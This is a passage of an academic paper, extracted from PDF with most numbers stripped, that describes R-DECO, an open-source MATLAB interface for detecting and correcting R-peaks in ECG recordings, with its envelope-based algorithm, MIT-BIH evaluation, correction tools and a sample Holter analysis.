thresholds. despite high detection rates, some qrs-complexes remain undetected. reasons for this might be small amplitudes, wide complexes or contamination by noise (arzeno, deng & poon, ). therefore, in many algorithms an extra post-processing step is added for the exact determination of the temporal location of the detected qrs-complex. one of the most established qrs detection algorithms is the pan–tompkins algorithm (pan & tompkins, ). although it was developed in the eighties, it achieves comparable performance to many more elaborate algorithms (elgendi et al., ). in this paper, an envelope-based procedure that enhances the qrs-complexes and flattens the rest of the ecg is used in combination with an adapted version of the threshold-based approach of the pan–tompkins algorithm. this method, which was proposed by our group in varon et al. ( ), combines the simplicity of an envelope-based procedure, while maintaining the accuracy of many more elaborate methods. figure a normal heartbeat as recorded by an ecg. the qrs-complex can be observed in the center. the detection of this complex is crucial for almost all ecg analysis algorithms. full-size doi: . /peerj-cs. /fig- moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in a review paper, elgendi et al. ( ) have compared the results of beat detection algorithms on the mit-bih arrhythmia database. when comparing the results of the automated algorithms with expert annotations, they have shown that many algorithms obtained excellent accuracy. however, none of the algorithms reached perfection. this means that, no matter how good the qrs detection algorithm is, it is highly likely that not all annotations are correct. therefore, it is recommended to visually inspect and review each signal before further analysis (pichot et al., ). many of the existing ecg toolboxes have focussed on the derivation of hrv-analysis parameters from rr-intervals, the time between subsequent r-peaks. this makes sense, since most of the available hardware include some kind of qrs-complex detection algorithm. however, this does not necessarily mean that the output of these devices are the raw rr-intervals. many of these devices have a built-in post-processing algorithm, which compensates for false detections by averaging over a certain range of rr-intervals (niskanen et al., ; pichot et al., ; vicente et al., ). however, for some analyses, such as ecg derived respiration (edr) or beat-to-beat variability of repolarization (bvr), it is of utmost importance that the actual r-peak of the qrs-complex is detected. therefore, it is necessary to visualize the actual r-peak positions in the ecg signal and allow the possibility to make manual adaptations. in this paper, we present r-deco, a matlab-based, graphical user interface (gui) for the detection and correction of r-peaks. this user interface includes the developed r-peak detection algorithm and provides the user with the possibility to correct possible false detections in a very straightforward way. r-deco was developed by the biomedical data processing research team (biomed) at the department of electrical engineering (esat) of ku leuven. the software is freely available for windows operating systems at https://gitlab.esat.kuleuven.be/biomed-public/r-deco. the objective of this paper is to provide a detailed description of r-deco, including the proposed r-peak detection algorithm and an overview of the different possibilities of this new software. computational methods r-peak detection we developed an r-peak detection algorithm that is based on an enveloping procedure. it achieves a . % sensitivity and . % positive predictive value (ppv) on the mit/bih arrhythmia database (moody & mark, ). the algorithm can be divided in three steps: pre-processing, decision and post-processing. pre-processing the pre-processing consists of an enveloping procedure, which enhances the qrs-complexes and flattens the rest of the ecg (varon et al., ). a visual explanation of the method is shown in fig. . first, the upper (u) and lower (l) envelopes are computed from the ecg signal by the secant method. this method selects the segment with the steepest positive and negative slope in a user-defined window with length t. once u and l are obtained, they are used to moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://gitlab.esat.kuleuven.be/biomed-public/r-deco http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ derive a flattened version of the ecg signal (f): f = u - l. since l is subtracted from u, the baseline is eliminated and only a positive signal, f, remains. decision the locations of the qrs-complexes are found by detecting the peaks in the flattened ecg. these peaks are detected in three stages. first, all samples with an amplitude lower than the amplitude of the sample ms further are selected. the ms step size was experimentally defined. this results in the selection of the upward slopes. as a second step, only the upward slopes that are longer than the step size are selected in order to exclude small peaks. finally, the maximum is selected in a window, with a length equal to the step size, that starts from the last selected sample of the upward slope. a graphical representation of this process is shown in fig. . on this selection of peaks, the adaptive thresholding procedure of the pan–tompkins algorithm is applied to define the peaks that correspond to the qrs-complexes. post-processing the thresholding procedure generally produces satisfactory results for the detection of the qrs-complexes. however, some of the automatically generated rr-intervals might be physiologically unreasonable and need to be removed for further analysis. a slightly modified version of the search-back procedure as proposed in de chazal et al. ( ) was used for this purpose. once the positions of the qrs-complexes are identified, the original ecg is used to find the exact location of the r-peaks. the search for an r-peak is performed up to ms from the peak in the flattened signal. this extra search is necessary because the presence of large s-waves might shift the peak in the flattened signal toward the valley of the s-wave. figure enveloping procedure. the flattened ecg (f) is constructed by subtracting the lower envelope (l) from the upper envelope (u). this enhances the qrs-complex and flattens the rest of the ecg signal. full-size doi: . /peerj-cs. /fig- moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ evaluation on the physionet mit/bih arrhythmia database we used the mit/bih arrhythmia database to evaluate the proposed algorithm (moody & mark, ). this dataset consists of half-hour ecg signals, which were recorded in the boston’s beth israel hospital between and . all recordings were annotated by two independent cardiologists who also made a distinction between normal and abnormal beats. in total, , heartbeats were annotated, of which , were labeled as normal. each recording contains two channel ecg signals with a sampling frequency of hz. in most records, one channel is lead ii and the other channel is v . however, we only used the first channel for the evaluation. as mentioned previously, the pre-processing consists of a flattening step of the ecg with a user-defined window width. to evaluate the sensitivity of the performance to the choice of the width we have tested multiple window widths. as can be observed from fig. , comparable results were obtained for window widths between and ms. in table we list the r-peak detection results of the proposed algorithm with an envelope width of ms and without post-processing. we obtained an overall sensitivity of . % and ppv of . %. when including the post-processing, we obtained an overall sensitivity of . % and ppv of . %. these results are comparable with those in literature, especially with the pan–tompkins algorithm, which reaches a sensitivity of . % and a ppv of . % (elgendi et al., ). while these results are very promising, we can also observe that for some recordings only moderate detection results are achieved. this decrease in performance is generally due to loss of signal, unusual morphology or stretches of extremely irregular rhythms. for instance, recording and contain stretches where the signal is lost in the first channel. however, the recordings with the highest amount of false detections are , figure procedure to select r-peaks. the resulting flat ecg denoted f is indicated by the black line. the samples with an amplitude lower than the sample ms further are indicated by the magenta circles, with the last sample indicated by the green circle. the search window is indicated by the green line. the selected r-peaks are indicated by the black circles. a.u. stands for arbitrary units. full-size doi: . /peerj-cs. /fig- moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and . correctly detecting the r-peaks in recording has been proven difficult for many algorithms (pan & tompkins, ). it contains a lot of baseline wander and additionally, very tall and sharp p-waves. these characteristics make it difficult to distinguish p-waves from r-peaks and thus result in a high false positive count. however, the highest amount of false positives is observed in recording ( . % sensitivity). this might be explained by the extremely high percentage of premature ventricular contractions (pvc) present in the recording, almost %. since the envelope width was fixed during the detection process, one may assume that the performance could be improved if manual adjustments were permitted. this holds as well for other records with pvc’s, such as record . the noise tolerance of the algorithm was evaluated with the mit-bih noise stress test database (moody, muldrow & mark, ). we observed that both median ppv and sensitivity remained around % above a signal-to-noise-ratio of six db. from this threshold the performance of the algorithm decreased significantly. from the analysis of the results, we could deduce two main factors that influence the results of the algorithm: ( ) the envelope width and ( ) the rr-post processing. the number of samples in the envelope is important, since it can be regarded as a filter of the rr-intervals. smaller envelope widths might result in the enhancement of more peaks than only the r-peaks. this might be beneficial in the case of small r-peaks, but might also enhance artefact peaks. larger envelope widths might cause adjacent r-peaks to be merged in the flattened signal. in practice, this might result in the failure of detecting premature heartbeats, which appear shortly after the previous heartbeat. in summary, figure performance of the algorithm, compared to the choice of window width. (a) the positive predictive value and (b) the sensitivity of the algorithm. a window width between and ms results in the best performance. full-size doi: . /peerj-cs. /fig- moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table performance of the r-peak detection algorithm on the physionet mit/bih dataset. record total (beats) tp (beats) fp (beats) fn (beats) se (%) ppv (%) , , , , . . , , , , , , . . , , . . , , . . , , . , , . . , , , , . . , , , , , , . . , , , , . , , , , . , , . , , . . , , , , , , , , . . , , . , , . . , , . . , , . . , , . . , , . . , , , , . . , , . , , . , , . . , , . , , . , , . , , . , , . . , , . . , , (continued) moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a larger envelope width results in less false positives and more false negatives and the opposite is true for a small envelope width. a similar effect can be observed when the rr-intervals are post-processed. this increases the certainty of detection of the algorithm and thus results in less false positives. the downside is that, in the presence of abnormal rhythms, it also results in more false negatives. software description the algorithms have been implemented with matlab r a. we used guide, matlab’s gui development environment, to design the gui of r-deco. the current subsection describes the possible input data formats and the user interface. input data formats the standard input of the toolbox is raw or filtered ecg data. this can be both single- or multichannel ecg. since a plethora of open formats exist for storing the ecg, it would be impossible to write supporting software for all formats (niskanen et al., ). therefore, we focussed on the data formats that are most commonly used by our clinical partners in the cardiology department of the uz leuven, belgium. the following file formats are supported: � ishne-holter files (�.ecg) � matlab files (�.mat) � european data format (�.edf) � text files (�.txt) � excel files (�.xls or �.csv) an ishne-holter file is organized in a header record, followed by a data block that contains all digital ecg samples. this file format was developed to facilitate data exchange and research in the field of holter (badilini, ). the software automatically extracts all ecg channels and also the sampling frequency. a matlab formatted file can contain one variable, up to an entire workspace. therefore, if the file contains more than one variable, the user is prompted to select the variable containing the ecg signal. in the specific case that the selected file is a structure, the software allows to search within the structure until the ecg signal is selected. table (continued). record total (beats) tp (beats) fp (beats) fn (beats) se (%) ppv (%) , , . . , , , , , , . , , . , , . total , , . . moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a standard european data format, edf, file consists of a header record and the data records (kemp et al., ). it was originally intended for the digital storage and exchange of eeg and polysomnogram recordings, but currently it can store a variety of annotations and signals, such as emg, ecg and many more (kemp & olivan, ). since not all edf files have the same standard labels, the user is prompted to identify the ecg channel(s). additionally, the software attempts to identify the sampling frequency of the selected signal by scanning the file. as an extra feature, the software allows the user to load a session. when the current session is interrupted, the session can be saved as a matlab file. it includes all the analysis parameters, the ecg signal and the rr-intervals, if computed. when a previous session is loaded, the software restores the entire user interface to the moment on which the session was saved. this allows the user to pause and continue, whenever wanted. user interface the strength of this toolbox is that everything is operated through a single gui. as shown in fig. , it can be divided in five segments: data, filter, analysis period, r-peak detection and r-peak correction. all segments are described below. data in the data panel, the user has the option to load data in two different ways: from a file or from the matlab workspace. both can be accessed via the respective pushbuttons. figure the graphical user interface of r-deco. the user interface can be divided in five segments: (a) data, (b) filter, (c) analysis period, (d) r-peak detection and (e) r-peak correction. the ecg signal and the resulting tachogram are shown in respectively (f) and (g). the detected r-peaks are depicted as small blue circles. full-size doi: . /peerj-cs. /fig- moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ when a file is selected, the software visualizes a small segment of the ecg signal. if the signal is inverted, the user can indicate this and the file will be inverted before further analysis. the software also scans the selected file for the sampling frequency. if this is not found, the software prompts the user to manually indicate the sampling frequency. finally, the data panel also contains a reset button. this button allows the user to reset the entire gui. it empties all plots, restores all default variables and deletes all results. if the user has not yet saved the current analysis, the user is prompted to confirm the reset action to prevent unwanted loss of information. filter since ecg signals can be contaminated with noise, filtering is often essential for further analysis. r-deco provides three basic filters: high pass, low pass and a notch filter. the high pass filter consists of a zero phase, second order butterworth filter. the low pass filter consists of a zero phase, fourth order butterworth filter. finally, a zero phase notch filter is also included. the latter could be used to remove the power-line interference. important to note is that filtering actions are always executed on the original signal to ensure repeatability. in order to aid the user in the selection of appropriate frequency threshold(s), r-deco is able to compute and display the power spectrum. an estimate of the power spectrum is computed using the welch method (welch, ). as a default, we used a window of samples with % overlap. to visualize the effect of the filtering in the frequency domain, r-deco displays both the filtered and the original power spectrum. furthermore, the effect of the filtering in the time domain can also be investigated by checking the “show original” checkbox. this will overlay the original signal on top of the filtered signal (fig. ). analysis period in the analysis period panel the user has the possibility to define an analysis window. after pushing the “define analysis period” button, the user has to select a window by clicking, dragging and releasing the mouse. the window is shown as a transparent patch over the data and can be enlarged, shrinked or moved with the mouse. after the initial window figure example of a high pass filter. by clicking the “show original” checkbox, the original signal (light blue) is overlaid on the filtered signal (blue). full-size doi: . /peerj-cs. /fig- moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ is drawn, the user can further modify the analysis window by changing the start time and/or the duration of the window. when a window is selected, the user can accept the analysis window by pressing the “apply changes” button. this prompts the x-limits of the graph to match the analysis window and disables the window modifications. from here on, all further analysis will be performed solely on the selected window. all the above is very useful when the to-be-selected time period is known in advance, but this is not always the case. sometimes the selection of the analysis window is depending on certain patterns in the tachogram, hence the tachogram has to be constructed first. therefore, if r-peaks have been detected already, the user is prompted to indicate whether he/she would like to keep the detected r-peaks. r-peak detection the execution of the r-peak detection algorithm, as described in the first section, is initiated when the “detect peaks” button is pushed. however, before the actual algorithm is executed, the user is able to adjust the default parameters of the algorithm. in fig. , an epoch of s of the ecg signal and its respective enveloped signal is shown as an example of the flattening procedure. the user can adjust the envelope size to the desired value and enact the changes by pressing the “apply” button. additionally, an estimation of the average heart rate can be defined to compute the boundaries of normal-to-normal rr-intervals. lastly, the user can select the automatic post-processing of the rr-intervals. since some devices have built-in qrs detection algorithms and some researchers have their own preferred qrs detection algorithm, the software allows to load r-peak locations. these will be displayed the same way the r-peaks of the algorithm are displayed. r-peak correction in case of hrv studies, only the normal-to-normal rr-intervals need to be taken into account. this can be achieved by selecting the ectopic removal option. this option corrects ectopic beats, without altering the normal rr-intervals. figure the r-peak parameter selection window. the user can adjust the envelope size, the average heart rate and indicate if rr post-processing is necessary. pressing the default button restores the default values. full-size doi: . /peerj-cs. /fig- moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ after finishing the detection process, either by detecting or loading the r-peaks, it is still possible that not all r-peaks are accurately detected. in r-deco, the user can make manual and (semi-)automatic adjustments to the r-peak locations. the manual methods are: add, adjust and delete. these methods can be activated by selecting the specific radiobuttons or via a context menu, which is linked to each r-peak. these manual methods allow the user to correct wrong or missing annotations either in all or in individual leads. � add: when this radiobutton is active, new r-peaks can be added by clicking in the ecg graph. the program selects the signal sample that is closest to the mouse position in a symmetric window of ms around the mouse position. upon mouse release, a new r-peak is added and the tachogram is adapted. � adjust: while hovering over the ecg graph, the r-peak closest to the mouse location is selected. after clicking on the desired r-peak, it can be moved by dragging the mouse. the movement of the selected r-peak is restricted by the previous and next r-peak. while adjusting the r-peak location, the tachogram is automatically updated. upon mouse release, the new r-peak location is saved. � delete: while hovering over the ecg graph, the r-peak closest to the mouse location is selected. after clicking on the desired r-peak, more to-be-deleted r-peaks can be selected by dragging the mouse. upon mouse release, the selected r-peaks are removed and the tachogram is adapted. the three (semi-)automatic r-peak correction methods are: cross-correlation, peak conversion and maximum search. � cross correlation: for this method, a symmetrical window of ms around each r-peak is selected. then, all heartbeats are normalized by subtracting the mean and dividing it by the standard deviation. then, a trimmed average qrs-complex is computed of all the positive and “negative” r-peaks. in this work a “negative” r-peak is understood as the absence of an r-peak or the presence of a very prominent s-wave, also described as rs-complex. � the user is prompted to select either the positive or the “negative” average heartbeat. if necessary, the user can also adjust the location of the r-peak on the selected template. this is all graphically displayed as shown in fig. . finally, the cross-correlation of every heartbeat is computed with the trimmed average and the r-peak is re-located, based on the highest correlation value. � peak conversion: the absolute amplitude of every r-peak annotation is compared with the previous and next sample’s absolute amplitude. if it is bigger than the previous and smaller than the next, the location of the r-peak will be shifted forward, until an extremum is obtained. if it is the other way around, the location of the r-peak will be shifted backwards. � this functionality avoids the “jumping” of r-peaks from, for example, an actual r-peak to a pre-mature ventricular contraction, which might be the case when window search is moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ applied. furthermore, pressing the button more than once will not affect the relocation after one correction. � maximum search: firstly, a symmetric window of ms around each r-peak is selected. secondly, the user is prompted to select either the maximum, minimum or absolute maximum. based on this selection, the respective extremum within the window is selected as new r-peak location. save and export results by default, the results are saved as a matlab file. this file includes the r-peak locations and the rr-intervals, which can further be used for hrv-, bvr- or any other analysis that requires r-peak detection. additionally, the software can export the results in two different ways: ( ) an excel file and ( ) a matlab file. ( ) excel file (�.xls): a new workbook is created with a general overview of the file on the first sheet: the number of channels, the sampling frequency, the duration of the signal and the duration of the analysis period. the number of additional sheets is defined by the number of channels, since for every channel, a separate sheet is created. this contains the r-peak locations, the rr-intervals and a number of basic metrics, such as the mean heart rate. ( ) matlab file (�.mat): this file contains a single structure named data. in accordance to the structure of the excel file, a structure is created per channel. this contains the signal in the analysis window, the r-peak locations and the rr-intervals. this option is especially useful for further analysis in matlab. data browser in order to graphically correct the r-peaks it is important to have a clear view of the segment to be investigated. therefore, after the r-peaks are detected, the software immediately displays the ecg signal with the r-peak annotations and the respective tachogram, as can be seen in fig. . the window width of the x-axis can be adjusted in three different ways: ( ) the range edit box, ( ) the plus and minus buttons or ( ) by using the zoom button. all three methods also adjust the width of the scroll bar. the scroll bar can be used to slide through the signal. since both axes are linked, both slide at the same time. the limits of the y-axis in both axes are adjusted automatically according to the data within the selected range. however, if the “fix y-limits” checkbox is selected, the range of the y-axis of the tachogram is fixed to the current limits. since some users favor a tachogram that displays the rr-intervals, while others favor hr values, we made it possible to switch between the two. an ecg recording with multiple channels might result in axes that become unclear. therefore, r-deco enables the user to switch view between different channels. this way the user can select one, multiple or all channels. if the channel labels are not present in the signal file, r-deco names and numbers the channels itself: channel , channel , etc. moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ however, it also provides the possibility to change these names. when the user clicks twice on a channel name in the listbox, a dialog box pops up that allows the user to choose a new name. this will be adjusted in the listbox, and also in the output files. figure the data browsing options of r-deco. full-size doi: . /peerj-cs. /fig- figure the template selection window. the user can select either the positive or “negative” r-peak template and can shift the location of the r-peak if necessary. full-size doi: . /peerj-cs. /fig- moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ an extra feature is the possibility to take “pictures” of the axes. this saves both axes in a format of choice, without including any of the buttons or bars from the user interface. in order to design the axes to the user’s taste, r-deco allows to change the line colors and the grid lines. preferences the analysis settings of r-deco can be adjusted via the preferences menu. note that the changes only apply for the current session and are not saved for the next session. this will be adjusted in a future release. the preference menu can be divided in four segments: power spectrum, filter, detection and correction � power spectrum: all variables of the welch method can be adjusted here. � filter: the type and order of the filter can be defined here. � detection: the default input parameters for the r-peak detection algorithm can be adjusted here. whenever the default button is pressed in the parameter selection window, see fig. , all parameters are reset to the values defined in this segment. � correction: for all correction methods, the user can define the window size in which the new r-peak is supposed to be located. sample run as a sample run, we used a h digital holter signal that was recorded from a male subject with ischaemic heart disease. the idea was to investigate the temporal evolution in bvr before spontaneous non-sustained ventricular tachycardia (nsvt). before analysis could be performed, the nsvt episodes needed to be identified and the r-peaks needed to be detected. once the signal was loaded and the sampling frequency was defined, we first had a look at the power spectrum. according to the plot, no power line interference was present, since we could not observe a peak at or hz. however, it was clear that most of the power was situated in the lower frequency bands. this could indicate the presence of baseline wander. therefore, we high-pass filtered the signal with a cut-off frequency of . hz. the result in the power spectrum can be observed in fig. . next, the nsvt episodes needed to be identified. however, the time stamps of the episodes were not known. therefore, it was necessary to detect the r-peaks first. this way the nsvt episodes could be identified from the tachogram. an example of an nsvt episode, taken with the picture button, can be observed in fig. . based on the example signal, we selected an envelope size of ms, which provided the best results for this signal. this envelope size ensures the enhancement of the qrs- complexes, without skipping any beats. additionally, we indicated that no post-processing of the rr-intervals is wanted, since we wanted to be able to detect nsvt segments as well. the nsvt episodes were identified based on the resulting rr-intervals. from the start of one of these episodes, we selected consecutive heartbeats (thomsen et al., ). only normal-to-normal intervals should be taken into account for bvr-analysis. hence, moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (ventricular) ectopic and post-extrasystolic beats were removed for further analysis, as can be observed in fig. . after the rr-intervals in the wanted analysis window were selected, the analysis results were saved. this was done by selecting “save results” on the menu bar and entering a file name. the results are then saved as a matlab file and can be loaded for the following bvr-analysis. note that the results can also be exported as an excel file. figure result of the high pass filtering in the power spectrum. full-size doi: . /peerj-cs. /fig- figure example of an nsvt segment with correction (a); the resulting tachogram is shown in (b). full-size doi: . /peerj-cs. /fig- moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ potential of future growth r-deco is the first step toward a complete ecg processing tool. at the moment, it focusses on accurate r-peak detection and intuitive correction options. therefore, it is a complementary tool for existing hrv-analysis toolboxes, which tend to focus on the computation of hrv metrics from rr-intervals. although some toolboxes already provide the possibility to detect r-peaks, their possibility to correct r-peak annotations is rather limited (pichot et al., ; rodenhauser et al., ; vicente et al., ). additionally, to the best of our knowledge, none of the existing toolboxes provide filtering, r-peak detection and correction all together. the main advantage of r-deco is the easy-to-use, intuitive gui. all actions are performed in one window, which simplifies the use and reduces the learning time. several extra features are being developed and will be released in future versions. we intend to add support for other input file formats, such as hierarchical data format files, general data format files, etc. however, most improvements will be in the number of analysis options. some of the first extra analysis options will be automatic signal quality detection, edr and hrv-analysis. conclusion r-deco is a matlab based gui for detecting and correcting r-peaks in ecg signals. the goal of r-deco is to provide a complete workflow from the raw signal to the tachogram. it includes an accurate r-peak detection algorithm, the performance of which is comparable to the state-of-the-art, and allows the user to graphically correct wrong or missing detections. additionally, r-deco supports a variety of ecg input file formats, figure example of an nsvt segment with correction (a); the resulting tachogram is shown in (b). full-size doi: . /peerj-cs. /fig- moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. which allows the processing of recordings directly from the recording device. this makes it a tool that can be used both by engineers, and clinicians. we included some basic pre-processing options, such as three filters and the possibility to select an analysis window. the analysis results can be exported to the matlab workspace or excel for later analysis. r-deco is available free of charge and can be downloaded from https://gitlab.esat. kuleuven.be/biomed-public/r-deco. acknowledgements matthew amoni is a doctoral fellow of the research foundation-flanders (fwo). carolina varon is a postdoctoral fellow of the research foundation-flanders (fwo). rik willems is a senior clinical investigator of the research foundation-flanders (fwo). additional information and declarations funding this work was supported by the bijzonder onderzoeksfonds ku leuven (bof): c / / , c / / ; agentschap innoveren & ondernemen (vlaio): stw osa+, o&o hbc ewatch; belgian foreign affairs-development cooperation: vlir uos programs ( - ); eu: , , , . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: bijzonder onderzoeksfonds ku leuven (bof): c / / , c / / . agentschap innoveren & ondernemen (vlaio): stw osa+, o&o hbc ewatch. belgian foreign affairs-development cooperation: vlir uos programs ( – ). eu: , , , . competing interests the authors declare that they have no competing interests. author contributions � jonathan moeyersons conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � matthew amoni conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft, provide inside in the wishes of cardiologists. � sabine van huffel conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://gitlab.esat.kuleuven.be/biomed-public/r-deco https://gitlab.esat.kuleuven.be/biomed-public/r-deco https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. � rik willems conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft, provide inside in the wishes of cardiologists. � carolina varon conceived and designed the experiments, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the codes are available at: moeyersons j, amoni m, van huffel s, willems r, varon c, r-deco: an open-source matlab-based graphical user interface for the detection and correction of r-peaks, under revision, . https://gitlab.esat.kuleuven.be/biomed- public/r-deco. references arzeno nn, deng zd, poon cs. . analysis of first-derivative based qrs detection algorithms. ieee transaction on biomedical engineering ( ): – doi . /tbme. . . badilini f. . the ishne holter standard output file format. annals of noninvasive electrocardiology ( ): – . chen s-w, chen h-c, chan h-l. . a real-time qrs detection method based on moving-averaging incorporating with wavelet denoising. computer methods and programs in biomedicine ( ): – doi . /j.cmpb. . . . de chazal p, heneghan c, sheridan e, reilly r, nolan p, o’malley m. . automated processing of the single-lead electrocardiogram for the detection of obstructive sleep apnoea. ieee transactions on biomedical engineering ( ): – doi . /tbme. . . dohare ak, kumar v, kumar r. . an efficient new method for the detection of qrs in electrocardiogram. computers & electrical engineering ( ): – doi . /j.compeleceng. . . . elgendi m, eskofier b, dokos s, abbott d. . revisiting qrs detection methodologies for portable, wearable, battery-operated, and wireless ecg systems. plos one ( ):e doi . /journal.pone. . fujii t, nakano m, yamashita k, konishi t, izumi s, kawaguchi h, yoshimoto m. . noise-tolerant instantaneous heart rate and r-peak detection using short-term autocorrelation for wearable healthcare systems. in: th annual international conference of the ieee engineering in medicine and biology society (embc), osaka. – . kemp b, olivan j. . european data format ‘plus’ (edf+), an edf alike standard format for the exchange of physiological data. clinical neurophysiology ( ): – doi . /s - ( ) - . kemp b, värri a, rosa ac, nielsen kd, gade j. . a simple format for exchange of digitized polygraphic recordings. electroencephalography and clinical neurophysiology ( ): – . kohler b, hennig c, orglmeister r. . the principles of software qrs detection. ieee engineering in medicine and biology magazine ( ): – doi . / . . moody gb, mark rg. . the impact of the mit-bih arrhythmia database. ieee engineering in medicine and biology magazine ( ): – . moody gb, muldrow wk, mark rg. . a noise stress test for arrhythmia detectors. computers in cardiology : – . moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://gitlab.esat.kuleuven.be/biomed-public/r-deco https://gitlab.esat.kuleuven.be/biomed-public/r-deco http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /j.cmpb. . . http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /j.compeleceng. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. niskanen j-p, tarvainen mp, ranta-aho po, karjalainen pa. . software for advanced hrv analysis. computer methods and programs in biomedicine ( ): – doi . /j.cmpb. . . . pan j, tompkins wj. . a real-time qrs detection algorithm. ieee transactions on biomedical engineering ( ): – doi . /tbme. . . pichot v, roche f, celle s, barthélémy j-c, chouchou f. . hrvanalysis: a free software for analyzing cardiac autonomic activity. frontiers in physiology : doi . /fphys. . . rodenhauser a, good ww, zenger b, tate j, aras k, burton b, macleod rs. . pfeifer: preprocessing framework for electrograms intermittently fiducialized from experimental recordings. journal of open source software ( ): doi . /joss. . sharma ld, sunkaria rk. . a robust qrs detection using novel pre-processing techniques and kurtosis based enhanced efficiency. measurement : – doi . /j.measurement. . . . thomsen mb, verduyn sc, stengl m, beekman jd, de pater g, van opstal j, volders pg, vos ma. . increased short-term variability of repolarization predicts d-sotalol-induced torsades de pointes in dogs. circulation ( ): – doi . / .cir. . .c . varon c, caicedo a, testelmans d, buyse b, huffel sv. . a novel algorithm for the automatic detection of sleep apnea from single-lead ecg. ieee transactions on biomedical engineering ( ): – doi . /tbme. . . vicente j, johannesen l, galeotti l, strauss dg. . ecglab: user friendly ecg/vcg analysis tool for research environments. computing in cardiology : – . welch p. . the use of fast fourier transform for the estimation of power spectra: a method based on time averaging over short, modified periodograms. ieee transactions on audio and electroacoustics ( ): – doi . /tau. . . moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.cmpb. . . http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /fphys. . http://dx.doi.org/ . /joss. http://dx.doi.org/ . /j.measurement. . . http://dx.doi.org/ . / .cir. . .c http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /tau. . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. r-deco: an open-source matlab based graphical user interface for the detection and correction of r-peaks introduction computational methods software description sample run potential of future growth conclusion flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy 